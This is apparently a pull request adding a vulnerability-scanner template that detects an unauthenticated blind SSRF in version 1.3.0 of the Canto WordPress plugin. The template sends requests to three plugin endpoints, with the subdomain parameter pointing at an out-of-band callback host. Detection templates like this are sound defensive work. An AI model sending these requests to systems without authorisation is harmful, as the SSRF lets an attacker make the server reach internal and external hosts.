### PR TITLE
Create wp-plugin-canto-blind-ssrf.yaml

### DIFF
--- a/wp-plugin-canto-blind-ssrf.yaml
+++ b/wp-plugin-canto-blind-ssrf.yaml
@@ -1,0 +1,22 @@
+id: wp-plugin-canto-blind-ssrf
+
+info:
+  name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
+  author: 0x_Akoko
+  severity: medium
+  description: The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities. It allows an unauthenticated attacker to make a request to any Internal and External Server via subdomain parameter.
+  reference: https://www.exploit-db.com/exploits/49189
+  tags: ssrf,wordpress,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain=https://{{interactsh-url}}'
+      - '{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain=https://{{interactsh-url}}'
+      - '{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain=https://{{interactsh-url}}'
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"


### PR DESCRIPTION
### Template / PR Information

Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
Date: 03/12/2020
Exploit Author: Pankaj Verma (_p4nk4j)
Vendor Homepage: https://www.canto.com/integrations/wordpress/
Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin
Version: 1.3.0
Tested on: Ubuntu 18.04
CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978

Description:-
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities.
It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter.

- References: https://www.exploit-db.com/exploits/49189

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO
